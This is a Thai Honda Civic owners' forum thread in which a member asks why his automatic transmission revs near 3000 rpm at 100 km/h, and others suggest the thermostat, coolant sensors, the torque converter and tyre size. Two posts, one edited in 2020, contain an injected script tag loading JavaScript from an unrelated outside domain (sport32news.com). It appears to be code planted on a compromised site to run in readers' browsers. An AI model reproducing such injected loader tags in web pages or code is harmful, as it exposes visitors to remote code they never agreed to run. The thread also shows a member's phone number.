ตอบ
suttijate


ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

ที่อยู่: นนทบุรี
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 ธันวา 2013 22:12 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
ปกติที่เคยค้นกระทู้เก่าที่เค้าพูดกันครับ เกียร์ AT วิ่ง 100 km รอบประมาณ 2500 แต่รถผม วิ่ง 100 km รอบปาไป เกือบๆ 3000 ครับ แล้วพอวิ่งขึ้นไปประมาณ 150km ความเร็วจะไต่ขึ้นไปอีกช้ามากๆเลยครับ กว่าจะขึ้นไปถึง 170-180 เนี่ยเหนื่อยเลยครับ อยากทราบว่าเป็นที่อะไรครับ เพราะเคยโอเวอฮอลเกียร์มารอบนึงแล้วครับก็ยังเป็นเหมือนเดิม สอบถามผู้รู้ช่วยด้วยครับ
ได้รับคำขอบคุณจาก: Hnong  N_J Civic 
pongzaar


ชื่อเล่น: ปอง

เข้าร่วม: 18 มกรา 2013
ตอบ: 107

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 152
ให้คำขอบคุณ: 25

ที่อยู่: Ubonratchathani
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 4 ธันวา 2013 22:32 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
เกียร์มันไม่ยอมเปลี่ยนให้รึเปล่า ครับ
ได้รับคำขอบคุณจาก: Hnong 
phasit


เข้าร่วม: 22 กุมภา 2013
ตอบ: 1522

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1144
ให้คำขอบคุณ: 2814

ที่อยู่: พระราม3 - อุทัยธานี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 ธันวา 2013 22:34 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
น่าจะเป็นที่เกียร์น่ะครับ
ได้รับคำขอบคุณจาก: Hnong 
tokmun002


ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ที่อยู่: พระประแดง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 4 ธันวา 2013 22:39 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
ท่อก็มีส่วนครับ. รถผมก็เป็น
ได้รับคำขอบคุณจาก: Hnong 
suttijate


ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

ที่อยู่: นนทบุรี
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 ธันวา 2013 22:43 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
pongzaar พิมพ์ว่า:
เกียร์มันไม่ยอมเปลี่ยนให้รึเปล่า ครับ



เกีย 4 แล้วครับ
ได้รับคำขอบคุณจาก: Hnong 
yogo


ชื่อเล่น: โย

เข้าร่วม: 21 มกรา 2013
ตอบ: 144

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 86
ให้คำขอบคุณ: 0

ที่อยู่: ชลบุรี(อมตะนคร)
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 ธันวา 2013 22:43 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
..
ได้รับคำขอบคุณจาก: suttijate 
suttijate


ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

ที่อยู่: นนทบุรี
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 4 ธันวา 2013 22:44 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
phasit พิมพ์ว่า:
น่าจะเป็นที่เกียร์น่ะครับ



ก่อนเกียร์วืดก็วิ่งเท่านี้ครับ พอฮอลเกียร ออกมาก็วิ่งเท่าเดิมครับ
ได้รับคำขอบคุณจาก: Hnong 
indica999


เข้าร่วม: 02 สิงหา 2013
ตอบ: 286

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 569
ให้คำขอบคุณ: 190
พุธ, 4 ธันวา 2013 22:46 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
อาการแบบหม้อพักใส้ขาดรึเปล่าเพราะก่อนหน้านี้ผมเป็น ลองหาดูนะครับ ว่าพักใบไหน
ปล.อันนี้ประสบการ์ณส่วนตัวรอท่านอื่นมาชี้แจงอีกที
ได้รับคำขอบคุณจาก: Hnong  suttijate 
Vee


ชื่อเล่น: วีครับ

เข้าร่วม: 18 กันยา 2013
ตอบ: 2999

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1210
ให้คำขอบคุณ: 2387

ที่อยู่: นครปฐม@นวมินทร์
ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พุธ, 4 ธันวา 2013 22:49 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
..
ได้รับคำขอบคุณจาก: suttijate 
aumlight


ชื่อเล่น: อั้ม

เข้าร่วม: 27 พฤษภาคม 2013
ตอบ: 925

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 155

ที่อยู่: ES เมืองทอง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 4 ธันวา 2013 22:58 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
รอเก็บข้อมูลด้วยครับ

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: suttijate 
fufufulll


เข้าร่วม: 02 เมษา 2013
ตอบ: 75

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 57
ให้คำขอบคุณ: 82

ที่อยู่: ..............
พุธ, 4 ธันวา 2013 23:10 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
suttijate พิมพ์ว่า:
ปกติที่เคยค้นกระทู้เก่าที่เค้าพูดกันครับ เกียร์ AT วิ่ง 100 km รอบประมาณ 2500 แต่รถผม วิ่ง 100 km รอบปาไป เกือบๆ 3000 ครับ แล้วพอวิ่งขึ้นไปประมาณ 150km ความเร็วจะไต่ขึ้นไปอีกช้ามากๆเลยครับ กว่าจะขึ้นไปถึง 170-180 เนี่ยเหนื่อยเลยครับ อยากทราบว่าเป็นที่อะไรครับ เพราะเคยโอเวอฮอลเกียร์มารอบนึงแล้วครับก็ยังเป็นเหมือนเดิม สอบถามผู้รู้ช่วยด้วยครับ


เปลี่ยน วาล์วน้ำครับ หายแน่นอน ผมก็เคยเป็นอาการนี้ลองค้นหากระทู้เก่าๆดูคับ
ได้รับคำขอบคุณจาก: Hnong  tukkang  suttijate 
muzalime


ชื่อเล่น: เอเจ

เข้าร่วม: 21 สิงหา 2009
ตอบ: 41

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 37
ให้คำขอบคุณ: 109

ที่อยู่: เพรชเกษม81
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 5 ธันวา 2013 00:12 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
fufufulll พิมพ์ว่า:

suttijate พิมพ์ว่า:
ปกติที่เคยค้นกระทู้เก่าที่เค้าพูดกันครับ เกียร์ AT วิ่ง 100 km รอบประมาณ 2500 แต่รถผม วิ่ง 100 km รอบปาไป เกือบๆ 3000 ครับ แล้วพอวิ่งขึ้นไปประมาณ 150km ความเร็วจะไต่ขึ้นไปอีกช้ามากๆเลยครับ กว่าจะขึ้นไปถึง 170-180 เนี่ยเหนื่อยเลยครับ อยากทราบว่าเป็นที่อะไรครับ เพราะเคยโอเวอฮอลเกียร์มารอบนึงแล้วครับก็ยังเป็นเหมือนเดิม สอบถามผู้รู้ช่วยด้วยครับ


เปลี่ยน วาล์วน้ำครับ หายแน่นอน ผมก็เคยเป็นอาการนี้ลองค้นหากระทู้เก่าๆดูคับ

ให้น้ำหนักเรื่องนี้ เพราะเคยเป็นมาเช่นกัน
 
ได้รับคำขอบคุณจาก: Hnong  suttijate 
dsunto223


เข้าร่วม: 22 เมษา 2009
ตอบ: 26

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 16
ให้คำขอบคุณ: 0

ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 5 ธันวา 2013 00:23 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
เปลี่ยนวาล์วน้ำครับ อีกเสียงนึง ของผมก็เป็น เปลี่ยนเรียบร้อยใช้ได้เหมือนเดิม
ได้รับคำขอบคุณจาก: Hnong  suttijate 
inkman


ชื่อเล่น: วี

เข้าร่วม: 16 กรกฎา 2013
ตอบ: 497

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 247
ให้คำขอบคุณ: 329

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 5 ธันวา 2013 03:03 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
เก็บข้อมูล
ได้รับคำขอบคุณจาก: suttijate 
Khachi


เข้าร่วม: 28 พฤษภาคม 2012
ตอบ: 538

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1342
ให้คำขอบคุณ: 4
พฤหัส, 5 ธันวา 2013 13:03 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
muzalime พิมพ์ว่า:

fufufulll พิมพ์ว่า:

suttijate พิมพ์ว่า:
ปกติที่เคยค้นกระทู้เก่าที่เค้าพูดกันครับ เกียร์ AT วิ่ง 100 km รอบประมาณ 2500 แต่รถผม วิ่ง 100 km รอบปาไป เกือบๆ 3000 ครับ แล้วพอวิ่งขึ้นไปประมาณ 150km ความเร็วจะไต่ขึ้นไปอีกช้ามากๆเลยครับ กว่าจะขึ้นไปถึง 170-180 เนี่ยเหนื่อยเลยครับ อยากทราบว่าเป็นที่อะไรครับ เพราะเคยโอเวอฮอลเกียร์มารอบนึงแล้วครับก็ยังเป็นเหมือนเดิม สอบถามผู้รู้ช่วยด้วยครับ


เปลี่ยน วาล์วน้ำครับ หายแน่นอน ผมก็เคยเป็นอาการนี้ลองค้นหากระทู้เก่าๆดูคับ

ให้น้ำหนักเรื่องนี้ เพราะเคยเป็นมาเช่นกัน


 

 
inkman พิมพ์ว่า:
เก็บข้อมูล


อาการคล้ายถอดวาล์วน้ำทิ้ง หรือไม่มีวาล์วน้ำ   หรือถ้ามีวาล์วน้ำ ก็ปิดไม่สนิทครับ
ผมเคยถอดวาล์ลลองวิ่งดู อาการแบบนี้เลย

ลองดูครับ ถ้าวิ่งแล้วเครื่องร้อนช้ามากๆ เช่น 10 นาทีแล้วเข็มยังไม่ถึงครึ่ง สันนิฐานไว้ก่อนเลย วาล์วน้ำไม่ปิด หรือปิดไม่สนิท หรือ
วาล์วน้ำโดนถอดออกไปแล้ว... ลองดูนะครับ ขอให้หายไวๆ  ซื้อเปลี่ยนตัวไม่กี่ร้อยเปลี่ยนเองก็ได้ แต่ยาลืมทากาวด้วยระครับ 

 
ได้รับคำขอบคุณจาก: Hnong  suttijate 
Hnong


ชื่อเล่น: หน่อง

เข้าร่วม: 30 พฤษภาคม 2013
ตอบ: 1189

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 590
ให้คำขอบคุณ: 401

ที่อยู่: นครนายก-หลักสี่แจ้งวัฒนะ
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 5 ธันวา 2013 13:10 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
ผมก็เป็นครับต้องจัดซะหน่อยแล้วขอบคุณ จขกท และทุกๆข้อมูลครับ
ได้รับคำขอบคุณจาก: suttijate 
tokmun002


ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ที่อยู่: พระประแดง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 5 ธันวา 2013 13:44 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
ผมตอนแรกอ่านจากข้อมูลให้ลองเปลี่ยนวาล์วน้ำตามที่เพื่อนๆบอกเลยไปจัดวาล์วน้ำมาใหม่เลยแต่ไม่หายครับ !
ได้รับคำขอบคุณจาก: suttijate 
suttijate


ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

ที่อยู่: นนทบุรี
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 5 ธันวา 2013 14:53 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
muzalime พิมพ์ว่า:
fufufulll พิมพ์ว่า:

suttijate พิมพ์ว่า:
ปกติที่เคยค้นกระทู้เก่าที่เค้าพูดกันครับ เกียร์ AT วิ่ง 100 km รอบประมาณ 2500 แต่รถผม วิ่ง 100 km รอบปาไป เกือบๆ 3000 ครับ แล้วพอวิ่งขึ้นไปประมาณ 150km ความเร็วจะไต่ขึ้นไปอีกช้ามากๆเลยครับ กว่าจะขึ้นไปถึง 170-180 เนี่ยเหนื่อยเลยครับ อยากทราบว่าเป็นที่อะไรครับ เพราะเคยโอเวอฮอลเกียร์มารอบนึงแล้วครับก็ยังเป็นเหมือนเดิม สอบถามผู้รู้ช่วยด้วยครับ


เปลี่ยน วาล์วน้ำครับ หายแน่นอน ผมก็เคยเป็นอาการนี้ลองค้นหากระทู้เก่าๆดูคับ

ให้น้ำหนักเรื่องนี้ เพราะเคยเป็นมาเช่นกัน
 



dsunto223 พิมพ์ว่า:
เปลี่ยนวาล์วน้ำครับ อีกเสียงนึง ของผมก็เป็น เปลี่ยนเรียบร้อยใช้ได้เหมือนเดิม


เปลี่ยนใหม่มาสองรอบแล้วครับ น้ำหม้อน้ำเคยหายเลยลองเปลี่ยนใหม่ดูอาการเหมือนเดิมครับ

phasit


เข้าร่วม: 22 กุมภา 2013
ตอบ: 1522

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1144
ให้คำขอบคุณ: 2814

ที่อยู่: พระราม3 - อุทัยธานี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 5 ธันวา 2013 17:02 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
suttijate พิมพ์ว่า:
muzalime พิมพ์ว่า:
fufufulll พิมพ์ว่า:

suttijate พิมพ์ว่า:
ปกติที่เคยค้นกระทู้เก่าที่เค้าพูดกันครับ เกียร์ AT วิ่ง 100 km รอบประมาณ 2500 แต่รถผม วิ่ง 100 km รอบปาไป เกือบๆ 3000 ครับ แล้วพอวิ่งขึ้นไปประมาณ 150km ความเร็วจะไต่ขึ้นไปอีกช้ามากๆเลยครับ กว่าจะขึ้นไปถึง 170-180 เนี่ยเหนื่อยเลยครับ อยากทราบว่าเป็นที่อะไรครับ เพราะเคยโอเวอฮอลเกียร์มารอบนึงแล้วครับก็ยังเป็นเหมือนเดิม สอบถามผู้รู้ช่วยด้วยครับ


เปลี่ยน วาล์วน้ำครับ หายแน่นอน ผมก็เคยเป็นอาการนี้ลองค้นหากระทู้เก่าๆดูคับ

ให้น้ำหนักเรื่องนี้ เพราะเคยเป็นมาเช่นกัน
 



dsunto223 พิมพ์ว่า:
เปลี่ยนวาล์วน้ำครับ อีกเสียงนึง ของผมก็เป็น เปลี่ยนเรียบร้อยใช้ได้เหมือนเดิม


เปลี่ยนใหม่มาสองรอบแล้วครับ น้ำหม้อน้ำเคยหายเลยลองเปลี่ยนใหม่ดูอาการเหมือนเดิมครับ



สงสัยจะเกียร์อีกแล้ว. .เกียร์ที่ทำมาวิ่งได้ประมาณกี่กิโลเมตรแล้วครับ
 
ได้รับคำขอบคุณจาก: suttijate 
suttijate


ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

ที่อยู่: นนทบุรี
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 5 ธันวา 2013 22:18 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
phasit พิมพ์ว่า:
suttijate พิมพ์ว่า:
muzalime พิมพ์ว่า:
fufufulll พิมพ์ว่า:

suttijate พิมพ์ว่า:
ปกติที่เคยค้นกระทู้เก่าที่เค้าพูดกันครับ เกียร์ AT วิ่ง 100 km รอบประมาณ 2500 แต่รถผม วิ่ง 100 km รอบปาไป เกือบๆ 3000 ครับ แล้วพอวิ่งขึ้นไปประมาณ 150km ความเร็วจะไต่ขึ้นไปอีกช้ามากๆเลยครับ กว่าจะขึ้นไปถึง 170-180 เนี่ยเหนื่อยเลยครับ อยากทราบว่าเป็นที่อะไรครับ เพราะเคยโอเวอฮอลเกียร์มารอบนึงแล้วครับก็ยังเป็นเหมือนเดิม สอบถามผู้รู้ช่วยด้วยครับ


เปลี่ยน วาล์วน้ำครับ หายแน่นอน ผมก็เคยเป็นอาการนี้ลองค้นหากระทู้เก่าๆดูคับ

ให้น้ำหนักเรื่องนี้ เพราะเคยเป็นมาเช่นกัน
 



dsunto223 พิมพ์ว่า:
เปลี่ยนวาล์วน้ำครับ อีกเสียงนึง ของผมก็เป็น เปลี่ยนเรียบร้อยใช้ได้เหมือนเดิม


เปลี่ยนใหม่มาสองรอบแล้วครับ น้ำหม้อน้ำเคยหายเลยลองเปลี่ยนใหม่ดูอาการเหมือนเดิมครับ



สงสัยจะเกียร์อีกแล้ว. .เกียร์ที่ทำมาวิ่งได้ประมาณกี่กิโลเมตรแล้วครับ
 


โอเวอร์ฮอลมาได้ประมาณ 70000 โลครับ แต่มันเป็นแบบนี้ตั้งแต่ฮอลเกียออกมาเลยแล้วครับ
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 5 ธันวา 2013 23:45 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
ท่านเจตครับ ขอทราบระบบไอเสียหน่อยครับ

แคต พักกลาง พักปลาย เป็นแบบไหนขนาดเท่าไหร่

ยางเบอร์อะไร 

ของพวกนี้มีผลต่อรอบเครื่อง
ได้รับคำขอบคุณจาก: suttijate 
suttijate


ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

ที่อยู่: นนทบุรี
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 6 ธันวา 2013 11:08 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
athongchum พิมพ์ว่า:
ท่านเจตครับ ขอทราบระบบไอเสียหน่อยครับ

แคต พักกลาง พักปลาย เป็นแบบไหนขนาดเท่าไหร่

ยางเบอร์อะไร 

ของพวกนี้มีผลต่อรอบเครื่อง



พักปลาย สปูน n1 พักกลางเดิม แคตของ DC5 ล้อSpoon ขอบ 15 ยาง 195/55/15 คร้าบบบบบ
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 6 ธันวา 2013 11:16 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
suttijate พิมพ์ว่า:
athongchum พิมพ์ว่า:
ท่านเจตครับ ขอทราบระบบไอเสียหน่อยครับ

แคต พักกลาง พักปลาย เป็นแบบไหนขนาดเท่าไหร่

ยางเบอร์อะไร 

ของพวกนี้มีผลต่อรอบเครื่อง


พักปลาย สปูน n1 พักกลางเดิม แคตของ DC5 ล้อSpoon ขอบ 15 ยาง 195/55/15 คร้าบบบบบ


ยางขนาดนี้ ความเร็วที่โชว์ จะมากกว่าความเร็วจริงอีกน่ะ อยากลองเทียบกับไมล์รถผมมั้ยล่ะท่านเจต เดี๋ยวผมไปวิ่งเทียบให้ จะได้ชัดๆไปว่ามันปกติหรือป่าว



แก้ไขล่าสุดโดย เมื่อ ศุกร์, 20 พฤศจิกา 2020 10:59, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: suttijate 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
ศุกร์, 6 ธันวา 2013 11:21 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
ระบบหล่อเย็นมันยังมีเซ็นเซอร์อีก 2 ตัวนะครับ

1. Thermoswitch

2. ECT sensor (engine coolant temperature)

ถ้าตัวใดตัวนึงเสียหรือเสื่อม อาจจะทำให้รอบสูงอย่างที่ว่าได้

สุดท้ายมีอีกตัวคือ torque converter ครับ

http://www.civicesgroup.com/forum/topic24103


ปล ขนาดลุ้อผมว่าเกี่ยวแค่ไมล์อ่อนแก่ แต่ไม่เกี่ยวกับความสัมพันธ์ระหว่าง ความเร็วกับรอบ เพราะรถมันไม่รู้หรอกว่าคุณเปลี่ยนล้อมาใหญ่เล็กขนาดไหน 
ได้รับคำขอบคุณจาก: athongchum 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 6 ธันวา 2013 11:35 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
Ton- พิมพ์ว่า:
ระบบหล่อเย็นมันยังมีเซ็นเซอร์อีก 2 ตัวนะครับ

1. Thermoswitch

2. ECT sensor (engine coolant temperature)

ถ้าตัวใดตัวนึงเสียหรือเสื่อม อาจจะทำให้รอบสูงอย่างที่ว่าได้

สุดท้ายมีอีกตัวคือ torque converter ครับ

http://www.civicesgroup.com/forum/topic24103


ปล ขนาดลุ้อผมว่าเกี่ยวแค่ไมล์อ่อนแก่ แต่ไม่เกี่ยวกับความสัมพันธ์ระหว่าง ความเร็วกับรอบ เพราะรถมันไม่รู้หรอกว่าคุณเปลี่ยนล้อมาใหญ่เล็กขนาดไหน 




ไอ้ตัวที่น่ากลัวที่สุดเห็นจะเป็น torque converter น่ะพี่ ยังไม่เคยเห็นใครเปลี่ยนแผ่นคลัชของ torque เลย

ส่วนเรื่องของขนาดล้อผมก็ลืมไปเลยว่าเราดูจะไมล์รถ ผมคิดไปเทียบกับความเร็วจาก GPS ตลอดเลย ขอบคุณมากครับพี่ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: Ton-  suttijate 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
ศุกร์, 6 ธันวา 2013 11:45 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
ถ้าไม่อยากเสียตัง ลองหาเพื่อนสลับ sensor ทั้งสองตัว แล้ววิ่งดูว่าหายรึเปล่าครับ น่าจะถอดไม่ยาก
ได้รับคำขอบคุณจาก: suttijate 
dsunto223


เข้าร่วม: 22 เมษา 2009
ตอบ: 26

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 16
ให้คำขอบคุณ: 0

ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 6 ธันวา 2013 15:12 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
สังเกตุว่าความร้อนขึ้นช้ากว่าปรกติไหม ของผมวาล์วเสียไม่ปิดกันน้ำร้อนน้ำเย็น ทำให้ senser วัดอูณภูมิ อ่านค่าผิดพลาด
ว่าเครื่องยังไม่ร้อนทำให้ชดเชยรอบเครื่องทำงานสูงขึ้นเหมือนกับตอนเช้าที่เราสตาทครับ (ยิ่งวิ่งทำให้เครื่องยนต์ระบายความร้อนได้ดี)
รอบก็สูงกว่าปรกติ 100Km บางครั้งเกือบ3000รอบครับ
suttijate


ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

ที่อยู่: นนทบุรี
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 6 ธันวา 2013 17:25 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
athongchum พิมพ์ว่า:
suttijate พิมพ์ว่า:
athongchum พิมพ์ว่า:
ท่านเจตครับ ขอทราบระบบไอเสียหน่อยครับ

แคต พักกลาง พักปลาย เป็นแบบไหนขนาดเท่าไหร่

ยางเบอร์อะไร 

ของพวกนี้มีผลต่อรอบเครื่อง



พักปลาย สปูน n1 พักกลางเดิม แคตของ DC5 ล้อSpoon ขอบ 15 ยาง 195/55/15 คร้าบบบบบ




ยางขนาดนี้ ความเร็วที่โชว์ จะมากกว่าความเร็วจริงอีกน่ะ อยากลองเทียบกับไมล์รถผมมั้ยล่ะท่านเจต เดี๋ยวผมไปวิ่งเทียบให้ จะได้ชัดๆไปว่ามันปกติหรือป่าว โทรมาได้เลยน่ะ 0869779927 




Ton- พิมพ์ว่า:
ระบบหล่อเย็นมันยังมีเซ็นเซอร์อีก 2 ตัวนะครับ

1. Thermoswitch

2. ECT sensor (engine coolant temperature)

ถ้าตัวใดตัวนึงเสียหรือเสื่อม อาจจะทำให้รอบสูงอย่างที่ว่าได้

สุดท้ายมีอีกตัวคือ torque converter ครับ

http://www.civicesgroup.com/forum/topic24103


ปล ขนาดลุ้อผมว่าเกี่ยวแค่ไมล์อ่อนแก่ แต่ไม่เกี่ยวกับความสัมพันธ์ระหว่าง ความเร็วกับรอบ เพราะรถมันไม่รู้หรอกว่าคุณเปลี่ยนล้อมาใหญ่เล็กขนาดไหน 



ขอขอบคุณทั้งสองท่านมากเลยครับจะลองเช็คดูนะครับแต่จะเป ้นไปได้มั้ยครับว่าช่างที่ ออลเกียทำไม่จบอาจจะฮอลเป็นงาน ซ่อมไปซ่อมเฉพาะอะไหร่ที่เสียอย่างเดียวอะครับเพราะผมจ่ายค่า ฮอลเกียไปแค่13,000 เองอะครับ
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
ศุกร์, 6 ธันวา 2013 20:08 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
เคยถามช่างเห็นเค้าบอกว่า มันต้องมีการตั้งระยะแผ่นคลัช อะไรประมาณเนี้ย ไม่ชัวร์ครับ แต่ก็เป็นไปได้

หาอู่ที่ไว้ใจได้ลองให้เค้าตรวจสอบดู
ได้รับคำขอบคุณจาก: suttijate 
suttijate


ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

ที่อยู่: นนทบุรี
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 7 ธันวา 2013 22:38 - รอบเครื่อง AT สูงกว่าปกติครับ สอบถามผู้รู้ครับ.....!!!!!
Ton- พิมพ์ว่า:
เคยถามช่างเห็นเค้าบอกว่า มันต้องมีการตั้งระยะแผ่นคลัช อะไรประมาณเนี้ย ไม่ชัวร์ครับ แต่ก็เป็นไปได้

หาอู่ที่ไว้ใจได้ลองให้เค้าตรวจสอบดู



